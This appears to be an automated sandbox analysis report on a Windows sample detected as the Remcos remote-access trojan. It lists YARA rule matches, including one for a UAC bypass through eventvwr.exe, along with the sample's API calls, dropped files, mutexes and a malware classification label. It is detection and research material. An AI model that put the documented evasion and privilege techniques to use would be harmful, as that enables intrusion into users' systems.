Source: Yara match | File source: 0000000E.00000002.2151682675.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 6864, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR

          Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0041A76C SystemParametersInfoW

          System Summary

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_00FAEF24
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_05235A27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_073995A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_07390C5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_07390C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_073914F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_07391928
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_0739191B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_07393188
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Code function: 0_2_073910B8
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_014AEF24
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_070F0040
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0710AE2C
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_07105337
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_08873204
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_08872080
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0887B3E0
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0887B3F0
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0A2410B8
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0A241928
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0A24191A
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0A243188
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0A248750
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0A240C38
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0A240C80
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 9_2_0A2414F0
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00425152
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00435286
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_004513D4
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0045050B
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00436510
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_004316FB
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0043569E
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00443700
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_004257FB
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_004128E3
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00425964
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0041B917
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0043D9CC
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00435AD3
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00424BC3
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0043DBFB
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0044ABA9
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00433C0B
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00434D8A
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0043DE2A
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0041CEAF
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00435F08
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: String function: 00402073 appears 51 times
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: String function: 00432B90 appears 53 times
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: String function: 00432525 appears 41 times
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2129157362.0000000006EC0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2121128392.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2122420727.0000000002DDD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000000.2096814000.0000000000980000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesnwo.exe< vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2122420727.0000000002D51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameGB-lesson-forms.dll@ vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000000.00000002.2130051264.00000000072D0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Binary or memory string: OriginalFilenamesnwo.exe< vs SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.bmkNCLNkqvOpVZ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3fa2bd0.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3e35390.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 00000000.00000002.2123662025.0000000003D59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe PID: 3884, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 6204, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bmkNCLNkqvOpVZ.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, PpYJNMfTau1IasRZRx.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, PpYJNMfTau1IasRZRx.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.cs | Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.cs | Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.cs | Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@18/12@1/2
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | File created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Mutant created: \Sessions\1\BaseNamedObjects\765-8M14I5
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | File created: C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Virustotal: Detection: 32%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
